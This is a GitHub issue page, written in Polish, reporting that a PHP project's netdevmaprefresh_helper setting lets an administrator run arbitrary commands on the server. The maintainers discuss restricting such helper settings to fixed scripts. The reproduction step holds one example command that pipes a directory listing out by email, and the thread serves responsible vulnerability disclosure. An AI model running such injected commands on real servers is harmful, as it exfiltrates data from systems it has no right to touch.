Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

phpui.netdevmaprefresh_helper RCE #2231

Open
kosaa opened this issue Feb 15, 2022 · 2 comments
Open

phpui.netdevmaprefresh_helper RCE #2231

kosaa opened this issue Feb 15, 2022 · 2 comments
Labels

Comments

@kosaa
Copy link
Contributor

kosaa commented Feb 15, 2022

Opis błędu
Osoba z dostępem do zmiany ustawień może wykonać dowolną komendę na serwerze na poziomie uprawnień serwera www.

Odtworzenie problemu

  1. ustaw phpui.netdevmaprefresh_helper polecenie do wykonania, np.: ls | mail -s "message subject" [email protected]
  2. wejdź na ?m=netdevmap
  3. kliknij odśwież na mapie

Dodatkowe informacje
zapewne taka była intencja tej funkcji, żeby było elastycznie, ale na wszelki wypadek zgłaszam

@chilek
Copy link
Owner

chilek commented Feb 16, 2022

Dzięki za info. Sprawa jest znana od dawna, bo i założenie projektowe było takie, że pozwalamy w ramach takich ustawień jak to (i podobne np. phpui.ping_helper, phpui.arping_helper) podpięcie dowolnych poleceń wykonujących czarną robotą na serwerze. Jakimś rozwiązaniem mogłoby był zawężenie tego typu ustawień wyłącznie do określania parametrów uruchamianego na serwerze polecenie, a samo polecenie (pełna ścieżka) hardkodowane w PHP. Może nawet nie musiałaby być to pełna ścieżka, a po prostu nazwa skryptu, np. netdevmaprefresh.sh (wystarczyłoby, żeby taki skrypt był umieszczone w jednym z katalogów ze zmiennej środowiskiej PATH i zadziałałoby jak nalezy).

@kosaa
Copy link
Contributor Author

kosaa commented Feb 16, 2022

hmm... możliwość uruchamiania skryptu wyłącznie z konkretnego katalogu na pierwszy rzut oka brzmi jak rozwiązanie

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants